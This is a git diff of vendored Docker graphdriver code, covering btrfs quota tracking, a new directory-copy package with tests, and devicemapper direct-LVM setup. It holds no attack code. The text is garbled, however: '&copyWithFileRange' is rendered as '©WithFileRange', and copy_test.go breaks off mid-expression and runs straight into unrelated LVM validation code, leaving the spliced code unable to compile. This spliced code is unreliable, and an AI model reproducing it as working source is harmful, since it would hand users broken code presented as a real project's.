@@ -294,8 +311,27 @@ func subvolDelete(dirpath, name string) error { return nil } -func subvolEnableQuota(path string) error { - dir, err := openDir(path) +func (d *Driver) updateQuotaStatus() { + d.once.Do(func() { + if !d.quotaEnabled { + // In case quotaEnabled is not set, check qgroup and update quotaEnabled as needed + if err := subvolQgroupStatus(d.home); err != nil { + // quota is still not enabled + return + } + d.quotaEnabled = true + } + }) +} + +func (d *Driver) subvolEnableQuota() error { + d.updateQuotaStatus() + + if d.quotaEnabled { + return nil + } + + dir, err := openDir(d.home) if err != nil { return err } @@ -303,17 +339,25 @@ func subvolEnableQuota(path string) error { var args C.struct_btrfs_ioctl_quota_ctl_args args.cmd = C.BTRFS_QUOTA_CTL_ENABLE - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to enable btrfs quota for %s: %v", dir, errno.Error()) } + d.quotaEnabled = true + return nil } -func subvolDisableQuota(path string) error { - dir, err := openDir(path) +func (d *Driver) subvolDisableQuota() error { + d.updateQuotaStatus() + + if !d.quotaEnabled { + return nil + } + + dir, err := openDir(d.home) if err != nil { return err } @@ -321,24 +365,32 @@ func subvolDisableQuota(path string) error { var args C.struct_btrfs_ioctl_quota_ctl_args args.cmd = C.BTRFS_QUOTA_CTL_DISABLE - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to disable btrfs quota for %s: %v", dir, errno.Error()) } + d.quotaEnabled = false + return nil } -func subvolRescanQuota(path string) error { - dir, err := openDir(path) +func (d *Driver) subvolRescanQuota() error { + d.updateQuotaStatus() + + if !d.quotaEnabled { + return nil + } + + dir, err := openDir(d.home) if err != nil { return err } defer closeDir(dir) var args C.struct_btrfs_ioctl_quota_rescan_args - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to rescan btrfs quota for %s: %v", dir, errno.Error()) @@ -357,7 +409,7 @@ func subvolLimitQgroup(path string, size uint64) error { var args C.struct_btrfs_ioctl_qgroup_limit_args args.lim.max_referenced = C.__u64(size) args.lim.flags = C.BTRFS_QGROUP_LIMIT_MAX_RFER - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to limit qgroup for %s: %v", dir, errno.Error()) @@ -366,6 +418,60 @@ func subvolLimitQgroup(path string, size uint64) error { return nil } +// subvolQgroupStatus performs a BTRFS_IOC_TREE_SEARCH on the root path +// with search key of BTRFS_QGROUP_STATUS_KEY. +// In case qgroup is enabled, the retuned key type will match BTRFS_QGROUP_STATUS_KEY. +// For more details please see https://github.com/kdave/btrfs-progs/blob/v4.9/qgroup.c#L1035 +func subvolQgroupStatus(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_search_args + args.key.tree_id = C.BTRFS_QUOTA_TREE_OBJECTID + args.key.min_type = C.BTRFS_QGROUP_STATUS_KEY + args.key.max_type = C.BTRFS_QGROUP_STATUS_KEY + args.key.max_objectid = C.__u64(math.MaxUint64) + args.key.max_offset = C.__u64(math.MaxUint64) + args.key.max_transid = C.__u64(math.MaxUint64) + args.key.nr_items = 4096 + + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_TREE_SEARCH, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to search qgroup for %s: %v", path, errno.Error()) + } + sh := (*C.struct_btrfs_ioctl_search_header)(unsafe.Pointer(&args.buf)) + if sh._type != C.BTRFS_QGROUP_STATUS_KEY { + return fmt.Errorf("Invalid qgroup search header type for %s: %v", path, sh._type) + } + return nil +} + +func subvolLookupQgroup(path string) (uint64, error) { + dir, err := openDir(path) + if err != nil { + return 0, err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_ino_lookup_args + args.objectid = C.BTRFS_FIRST_FREE_OBJECTID + + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_INO_LOOKUP, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return 0, fmt.Errorf("Failed to lookup qgroup for %s: %v", dir, errno.Error()) + } + if args.treeid == 0 { + return 0, fmt.Errorf("Invalid qgroup id for %s: 0", dir) + } + + return uint64(args.treeid), nil +} + func (d *Driver) subvolumesDir() string { return path.Join(d.home, "subvolumes") } @@ -374,6 +480,14 @@ func (d *Driver) subvolumesDirID(id string) string { return path.Join(d.subvolumesDir(), id) } +func (d *Driver) quotasDir() string { + return path.Join(d.home, "quotas") +} + +func (d *Driver) quotasDirID(id string) string { + return path.Join(d.quotasDir(), id) +} + // CreateReadWrite creates a layer that is writable for use as a container // file system. func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { @@ -382,12 +496,13 @@ func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts // Create the filesystem with given id. func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + quotas := path.Join(d.home, "quotas") subvolumes := path.Join(d.home, "subvolumes") rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { return err } - if err := idtools.MkdirAllAs(subvolumes, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(subvolumes, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return err } if parent == "" { @@ -418,9 +533,16 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if err := d.parseStorageOpt(storageOpt, driver); err != nil { return err } + if err := d.setStorageSize(path.Join(subvolumes, id), driver); err != nil { return err } + if err := idtools.MkdirAllAndChown(quotas, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(quotas, id), []byte(fmt.Sprint(driver.options.size)), 0644); err != nil { + return err + } } // if we have a remapped root (user namespaces enabled), change the created snapshot @@ -467,19 +589,10 @@ func (d *Driver) setStorageSize(dir string, driver *Driver) error { if d.options.minSpace > 0 && driver.options.size < d.options.minSpace { return fmt.Errorf("btrfs: storage size cannot be less than %s", units.HumanSize(float64(d.options.minSpace))) } - - if !quotaEnabled { - if err := subvolEnableQuota(d.home); err != nil { - return err - } - quotaEnabled = true - } - - if err := subvolLimitQgroup(dir, driver.options.size); err != nil { + if err := d.subvolEnableQuota(); err != nil { return err } - - return nil + return subvolLimitQgroup(dir, driver.options.size) } // Remove the filesystem with given id. @@ -488,31 +601,51 @@ func (d *Driver) Remove(id string) error { if _, err := os.Stat(dir); err != nil { return err } - if err := subvolDelete(d.subvolumesDir(), id); err != nil { + quotasDir := d.quotasDirID(id) + if _, err := os.Stat(quotasDir); err == nil { + if err := os.Remove(quotasDir); err != nil { + return err + } + } else if !os.IsNotExist(err) { return err } - if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + + // Call updateQuotaStatus() to invoke status update + d.updateQuotaStatus() + + if err := subvolDelete(d.subvolumesDir(), id, d.quotaEnabled); err != nil { return err } - if err := subvolRescanQuota(d.home); err != nil { + if err := system.EnsureRemoveAll(dir); err != nil { return err } - return nil + return d.subvolRescanQuota() } // Get the requested filesystem id. -func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { dir := d.subvolumesDirID(id) st, err := os.Stat(dir) if err != nil { - return "", err + return nil, err } if !st.IsDir() { - return "", fmt.Errorf("%s: not a directory", dir) + return nil, fmt.Errorf("%s: not a directory", dir) } - return dir, nil + if quota, err := ioutil.ReadFile(d.quotasDirID(id)); err == nil { + if size, err := strconv.ParseUint(string(quota), 10, 64); err == nil && size >= d.options.minSpace { + if err := d.subvolEnableQuota(); err != nil { + return nil, err + } + if err := subvolLimitQgroup(dir, size); err != nil { + return nil, err + } + } + } + + return containerfs.NewLocalContainerFS(dir), nil } // Put is not implemented for BTRFS as there is no cleanup required for the id. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go index 0038dbcdcd..b70e93bc2d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go @@ -1,6 +1,6 @@ // +build linux -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" import ( "os" @@ -35,12 +35,14 @@ func TestBtrfsSubvolDelete(t *testing.T) { } defer graphtest.PutDriver(t) - dir, err := d.Get("test", "") + dirFS, err := d.Get("test", "") if err != nil { t.Fatal(err) } defer d.Put("test") + dir := dirFS.Path() + if err := subvolCreate(dir, "subvoltest"); err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go index f07088887a..d7793f8794 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go @@ -1,3 +1,3 @@ // +build !linux !cgo -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go index 73d90cdd71..2fb5c73555 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go @@ -1,6 +1,6 @@ // +build linux,!btrfs_noversion -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" /* #include diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go index f802fbc629..5c755f8177 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go @@ -1,6 +1,6 @@ // +build linux,btrfs_noversion -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" // TODO(vbatts) remove this work-around once supported linux distros are on // btrfs utilities of >= 3.16.1 diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go index 15a6e75cb3..465daadb0d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go @@ -1,6 +1,6 @@ // +build linux,!btrfs_noversion -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" import ( "testing" @@ -8,6 +8,6 @@ import ( func TestLibVersion(t *testing.T) { if btrfsLibVersion() <= 0 { - t.Errorf("expected output from btrfs lib version > 0") + t.Error("expected output from btrfs lib version > 0") } } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go new file mode 100644 index 0000000000..86316fdfe7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go @@ -0,0 +1,277 @@ +// +build linux + +package copy // import "github.com/docker/docker/daemon/graphdriver/copy" + +/* +#include + +#ifndef FICLONE +#define FICLONE _IOW(0x94, 9, int) +#endif +*/ +import "C" +import ( + "container/list" + "fmt" + "io" + "os" + "path/filepath" + "syscall" + "time" + + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" + "golang.org/x/sys/unix" +) + +// Mode indicates whether to use hardlink or copy content +type Mode int + +const ( + // Content creates a new file, and copies the content of the file + Content Mode = iota + // Hardlink creates a new hardlink to the existing file + Hardlink +) + +func copyRegular(srcPath, dstPath string, fileinfo os.FileInfo, copyWithFileRange, copyWithFileClone *bool) error { + srcFile, err := os.Open(srcPath) + if err != nil { + return err + } + defer srcFile.Close() + + // If the destination file already exists, we shouldn't blow it away + dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE|os.O_EXCL, fileinfo.Mode()) + if err != nil { + return err + } + defer dstFile.Close() + + if *copyWithFileClone { + _, _, err = unix.Syscall(unix.SYS_IOCTL, dstFile.Fd(), C.FICLONE, srcFile.Fd()) + if err == nil { + return nil + } + + *copyWithFileClone = false + if err == unix.EXDEV { + *copyWithFileRange = false + } + } + if *copyWithFileRange { + err = doCopyWithFileRange(srcFile, dstFile, fileinfo) + // Trying the file_clone may not have caught the exdev case + // as the ioctl may not have been available (therefore EINVAL) + if err == unix.EXDEV || err == unix.ENOSYS { + *copyWithFileRange = false + } else { + return err + } + } + return legacyCopy(srcFile, dstFile) +} + +func doCopyWithFileRange(srcFile, dstFile *os.File, fileinfo os.FileInfo) error { + amountLeftToCopy := fileinfo.Size() + + for amountLeftToCopy > 0 { + n, err := unix.CopyFileRange(int(srcFile.Fd()), nil, int(dstFile.Fd()), nil, int(amountLeftToCopy), 0) + if err != nil { + return err + } + + amountLeftToCopy = amountLeftToCopy - int64(n) + } + + return nil +} + +func legacyCopy(srcFile io.Reader, dstFile io.Writer) error { + _, err := pools.Copy(dstFile, srcFile) + + return err +} + +func copyXattr(srcPath, dstPath, attr string) error { + data, err := system.Lgetxattr(srcPath, attr) + if err != nil { + return err + } + if data != nil { + if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil { + return err + } + } + return nil +} + +type fileID struct { + dev uint64 + ino uint64 +} + +type dirMtimeInfo struct { + dstPath *string + stat *syscall.Stat_t +} + +// DirCopy copies or hardlinks the contents of one directory to another, +// properly handling xattrs, and soft links +// +// Copying xattrs can be opted out of by passing false for copyXattrs. +func DirCopy(srcDir, dstDir string, copyMode Mode, copyXattrs bool) error { + copyWithFileRange := true + copyWithFileClone := true + + // This is a map of source file inodes to dst file paths + copiedFiles := make(map[fileID]string) + + dirsToSetMtimes := list.New() + err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(srcDir, srcPath) + if err != nil { + return err + } + + dstPath := filepath.Join(dstDir, relPath) + if err != nil { + return err + } + + stat, ok := f.Sys().(*syscall.Stat_t) + if !ok { + return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath) + } + + isHardlink := false + + switch f.Mode() & os.ModeType { + case 0: // Regular file + id := fileID{dev: stat.Dev, ino: stat.Ino} + if copyMode == Hardlink { + isHardlink = true + if err2 := os.Link(srcPath, dstPath); err2 != nil { + return err2 + } + } else if hardLinkDstPath, ok := copiedFiles[id]; ok { + if err2 := os.Link(hardLinkDstPath, dstPath); err2 != nil { + return err2 + } + } else { + if err2 := copyRegular(srcPath, dstPath, f, ©WithFileRange, ©WithFileClone); err2 != nil { + return err2 + } + copiedFiles[id] = dstPath + } + + case os.ModeDir: + if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) { + return err + } + + case os.ModeSymlink: + link, err := os.Readlink(srcPath) + if err != nil { + return err + } + + if err := os.Symlink(link, dstPath); err != nil { + return err + } + + case os.ModeNamedPipe: + fallthrough + case os.ModeSocket: + if err := unix.Mkfifo(dstPath, stat.Mode); err != nil { + return err + } + + case os.ModeDevice: + if rsystem.RunningInUserNS() { + // cannot create a device if running in user namespace + return nil + } + if err := unix.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil { + return err + } + + default: + return fmt.Errorf("unknown file type for %s", srcPath) + } + + // Everything below is copying metadata from src to dst. All this metadata + // already shares an inode for hardlinks. + if isHardlink { + return nil + } + + if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil { + return err + } + + if copyXattrs { + if err := doCopyXattrs(srcPath, dstPath); err != nil { + return err + } + } + + isSymlink := f.Mode()&os.ModeSymlink != 0 + + // There is no LChmod, so ignore mode for symlink. Also, this + // must happen after chown, as that can modify the file mode + if !isSymlink { + if err := os.Chmod(dstPath, f.Mode()); err != nil { + return err + } + } + + // system.Chtimes doesn't support a NOFOLLOW flag atm + // nolint: unconvert + if f.IsDir() { + dirsToSetMtimes.PushFront(&dirMtimeInfo{dstPath: &dstPath, stat: stat}) + } else if !isSymlink { + aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec)) + if err := system.Chtimes(dstPath, aTime, mTime); err != nil { + return err + } + } else { + ts := []syscall.Timespec{stat.Atim, stat.Mtim} + if err := system.LUtimesNano(dstPath, ts); err != nil { + return err + } + } + return nil + }) + if err != nil { + return err + } + for e := dirsToSetMtimes.Front(); e != nil; e = e.Next() { + mtimeInfo := e.Value.(*dirMtimeInfo) + ts := []syscall.Timespec{mtimeInfo.stat.Atim, mtimeInfo.stat.Mtim} + if err := system.LUtimesNano(*mtimeInfo.dstPath, ts); err != nil { + return err + } + } + + return nil +} + +func doCopyXattrs(srcPath, dstPath string) error { + if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil { + return err + } + + // We need to copy this attribute if it appears in an overlay upper layer, as + // this function is used to copy those. It is set by overlay if a directory + // is removed and then re-created and should not inherit anything from the + // same dir in the lower dir. + return copyXattr(srcPath, dstPath, "trusted.overlay.opaque") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go new file mode 100644 index 0000000000..0f3b1670f7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go @@ -0,0 +1,159 @@ +// +build linux + +package copy // import "github.com/docker/docker/daemon/graphdriver/copy" + +import ( + "fmt" + "io/ioutil" + "math/rand" + "os" + "path/filepath" + "syscall" + "testing" + "time" + + "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCopy(t *testing.T) { + copyWithFileRange := true + copyWithFileClone := true + doCopyTest(t, ©WithFileRange, ©WithFileClone) +} + +func TestCopyWithoutRange(t *testing.T) { + copyWithFileRange := false + copyWithFileClone := false + doCopyTest(t, ©WithFileRange, ©WithFileClone) +} + +func TestCopyDir(t *testing.T) { + srcDir, err := ioutil.TempDir("", "srcDir") + assert.NilError(t, err) + populateSrcDir(t, srcDir, 3) + + dstDir, err := ioutil.TempDir("", "testdst") + assert.NilError(t, err) + defer os.RemoveAll(dstDir) + + assert.Check(t, DirCopy(srcDir, dstDir, Content, false)) + assert.NilError(t, filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(srcDir, srcPath) + assert.NilError(t, err) + if relPath == "." { + return nil + } + + dstPath := filepath.Join(dstDir, relPath) + assert.NilError(t, err) + + // If we add non-regular dirs and files to the test + // then we need to add more checks here. + dstFileInfo, err := os.Lstat(dstPath) + assert.NilError(t, err) + + srcFileSys := f.Sys().(*syscall.Stat_t) + dstFileSys := dstFileInfo.Sys().(*syscall.Stat_t) + + t.Log(relPath) + if srcFileSys.Dev == dstFileSys.Dev { + assert.Check(t, srcFileSys.Ino != dstFileSys.Ino) + } + // Todo: check size, and ctim is not equal + /// on filesystems that have granular ctimes + assert.Check(t, is.DeepEqual(srcFileSys.Mode, dstFileSys.Mode)) + assert.Check(t, is.DeepEqual(srcFileSys.Uid, dstFileSys.Uid)) + assert.Check(t, is.DeepEqual(srcFileSys.Gid, dstFileSys.Gid)) + assert.Check(t, is.DeepEqual(srcFileSys.Mtim, dstFileSys.Mtim)) + + return nil + })) +} + +func randomMode(baseMode int) os.FileMode { + for i := 0; i < 7; i++ { + baseMode = baseMode | (1&rand.Intn(2))< 0 && cfg.ThinpMetaPercent == 0) || cfg.ThinpMetaPercent > 0 && cfg.ThinpPercent == 0 { + return errThinpPercentMissing + } + + if cfg.ThinpPercent+cfg.ThinpMetaPercent > 100 { + return errThinpPercentTooBig + } + return nil +} + +func checkDevAvailable(dev string) error { + lvmScan, err := exec.LookPath("lvmdiskscan") + if err != nil { + logrus.Debug("could not find lvmdiskscan") + return nil + } + + out, err := exec.Command(lvmScan).CombinedOutput() + if err != nil { + logrus.WithError(err).Error(string(out)) + return nil + } + + if !bytes.Contains(out, []byte(dev)) { + return errors.Errorf("%s is not available for use with devicemapper", dev) + } + return nil +} + +func checkDevInVG(dev string) error { + pvDisplay, err := exec.LookPath("pvdisplay") + if err != nil { + logrus.Debug("could not find pvdisplay") + return nil + } + + out, err := exec.Command(pvDisplay, dev).CombinedOutput() + if err != nil { + logrus.WithError(err).Error(string(out)) + return nil + } + + scanner := bufio.NewScanner(bytes.NewReader(bytes.TrimSpace(out))) + for scanner.Scan() { + fields := strings.SplitAfter(strings.TrimSpace(scanner.Text()), "VG Name") + if len(fields) > 1 { + // got "VG Name" line" + vg := strings.TrimSpace(fields[1]) + if len(vg) > 0 { + return errors.Errorf("%s is already part of a volume group %q: must remove this device from any volume group or provide a different device", dev, vg) + } + logrus.Error(fields) + break + } + } + return nil +} + +func checkDevHasFS(dev string) error { + blkid, err := exec.LookPath("blkid") + if err != nil { + logrus.Debug("could not find blkid") + return nil + } + + out, err := exec.Command(blkid, dev).CombinedOutput() + if err != nil { + logrus.WithError(err).Error(string(out)) + return nil + } + + fields := bytes.Fields(out) + for _, f := range fields { + kv := bytes.Split(f, []byte{'='}) + if bytes.Equal(kv[0], []byte("TYPE")) { + v := bytes.Trim(kv[1], "\"") + if len(v) > 0 { + return errors.Errorf("%s has a filesystem already, use dm.directlvm_device_force=true if you want to wipe the device", dev) + } + return nil + } + } + return nil +} + +func verifyBlockDevice(dev string, force bool) error { + if err := checkDevAvailable(dev); err != nil { + return err + } + if err := checkDevInVG(dev); err != nil { + return err + } + if force { + return nil + } + return checkDevHasFS(dev) +} + +func readLVMConfig(root string) (directLVMConfig, error) { + var cfg directLVMConfig + + p := filepath.Join(root, "setup-config.json") + b, err := ioutil.ReadFile(p) + if err != nil { + if os.IsNotExist(err) { + return cfg, nil + } + return cfg, errors.Wrap(err, "error reading existing setup config") + } + + // check if this is just an empty file, no need to produce a json error later if so + if len(b) == 0 { + return cfg, nil + } + + err = json.Unmarshal(b, &cfg) + return cfg, errors.Wrap(err, "error unmarshaling previous device setup config") +} + +func writeLVMConfig(root string, cfg directLVMConfig) error { + p := filepath.Join(root, "setup-config.json") + b, err := json.Marshal(cfg) + if err != nil { + return errors.Wrap(err, "error marshalling direct lvm config") + } + err = ioutil.WriteFile(p, b, 0600) + return errors.Wrap(err, "error writing direct lvm config to file") +} + +func setupDirectLVM(cfg directLVMConfig) error { + lvmProfileDir := "/etc/lvm/profile" + binaries := []string{"pvcreate", "vgcreate", "lvcreate", "lvconvert", "lvchange", "thin_check"} + + for _, bin := range binaries { + if _, err := exec.LookPath(bin); err != nil { + return errors.Wrap(err, "error looking up command `"+bin+"` while setting up direct lvm") + } + } + + err := os.MkdirAll(lvmProfileDir, 0755) + if err != nil { + return errors.Wrap(err, "error creating lvm profile directory") + } + + if cfg.AutoExtendPercent == 0 { + cfg.AutoExtendPercent = 20 + } + + if cfg.AutoExtendThreshold == 0 { + cfg.AutoExtendThreshold = 80 + } + + if cfg.ThinpPercent == 0 { + cfg.ThinpPercent = 95 + } + if cfg.ThinpMetaPercent == 0 { + cfg.ThinpMetaPercent = 1 + } + + out, err := exec.Command("pvcreate", "-f", cfg.Device).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + out, err = exec.Command("vgcreate", "docker", cfg.Device).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + out, err = exec.Command("lvcreate", "--wipesignatures", "y", "-n", "thinpool", "docker", "--extents", fmt.Sprintf("%d%%VG", cfg.ThinpPercent)).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + out, err = exec.Command("lvcreate", "--wipesignatures", "y", "-n", "thinpoolmeta", "docker", "--extents", fmt.Sprintf("%d%%VG", cfg.ThinpMetaPercent)).CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + out, err = exec.Command("lvconvert", "-y", "--zero", "n", "-c", "512K", "--thinpool", "docker/thinpool", "--poolmetadata", "docker/thinpoolmeta").CombinedOutput() + if err != nil { + return errors.Wrap(err, string(out)) + } + + profile := fmt.Sprintf("activation{\nthin_pool_autoextend_threshold=%d\nthin_pool_autoextend_percent=%d\n}", cfg.AutoExtendThreshold, cfg.AutoExtendPercent) + err = ioutil.WriteFile(lvmProfileDir+"/docker-thinpool.profile", []byte(profile), 0600) + if err != nil { + return errors.Wrap(err, "error writing docker thinp autoextend profile") + } + + out, err = exec.Command("lvchange", "--metadataprofile", "docker-thinpool", "docker/thinpool").CombinedOutput() + return errors.Wrap(err, string(out)) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go index b8e762592c..2bfbf05a27 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go @@ -1,11 +1,10 @@ // +build linux -package devmapper +package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper" import ( "bufio" "encoding/json" - "errors" "fmt" "io" "io/ioutil" @@ -13,47 +12,46 @@ import ( "os/exec" "path" "path/filepath" + "reflect" "strconv" "strings" "sync" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/devicemapper" + "github.com/docker/docker/pkg/dmesg" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/loopback" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/go-units" - - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) var ( - defaultDataLoopbackSize int64 = 100 * 1024 * 1024 * 1024 - defaultMetaDataLoopbackSize int64 = 2 * 1024 * 1024 * 1024 - defaultBaseFsSize uint64 = 10 * 1024 * 1024 * 1024 - defaultThinpBlockSize uint32 = 128 // 64K = 128 512b sectors - defaultUdevSyncOverride = false - maxDeviceID = 0xffffff // 24 bit, pool limit - deviceIDMapSz = (maxDeviceID + 1) / 8 - // We retry device removal so many a times that even error messages - // will fill up console during normal operation. So only log Fatal - // messages by default. - logLevel = devicemapper.LogLevelFatal + defaultDataLoopbackSize int64 = 100 * 1024 * 1024 * 1024 + defaultMetaDataLoopbackSize int64 = 2 * 1024 * 1024 * 1024 + defaultBaseFsSize uint64 = 10 * 1024 * 1024 * 1024 + defaultThinpBlockSize uint32 = 128 // 64K = 128 512b sectors + defaultUdevSyncOverride = false + maxDeviceID = 0xffffff // 24 bit, pool limit + deviceIDMapSz = (maxDeviceID + 1) / 8 driverDeferredRemovalSupport = false enableDeferredRemoval = false enableDeferredDeletion = false userBaseSize = false defaultMinFreeSpacePercent uint32 = 10 + lvmSetupConfigForce bool ) -const deviceSetMetaFile string = "deviceset-metadata" -const transactionMetaFile string = "transaction-metadata" +const deviceSetMetaFile = "deviceset-metadata" +const transactionMetaFile = "transaction-metadata" type transaction struct { OpenTransactionID uint64 `json:"open_transaction_id"` @@ -123,6 +121,7 @@ type DeviceSet struct { gidMaps []idtools.IDMap minFreeSpacePercent uint32 //min free space percentage in thinpool xfsNospaceRetries string // max retries when xfs receives ENOSPC + lvmSetupConfig directLVMConfig } // DiskUsage contains information about disk usage and is used when reporting Status of a device. @@ -269,7 +268,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { if err != nil { return "", err } - if err := idtools.MkdirAllAs(dirname, 0700, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(dirname, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil { return "", err } @@ -277,7 +276,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { if !os.IsNotExist(err) { return "", err } - logrus.Debugf("devmapper: Creating loopback file %s for device-manage use", filename) + logrus.WithField("storage-driver", "devicemapper").Debugf("Creating loopback file %s for device-manage use", filename) file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600) if err != nil { return "", err @@ -298,7 +297,7 @@ func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { return "", fmt.Errorf("devmapper: Unable to grow loopback file %s: %v", filename, err) } } else if fi.Size() > size { - logrus.Warnf("devmapper: Can't shrink loopback file %s", filename) + logrus.WithField("storage-driver", 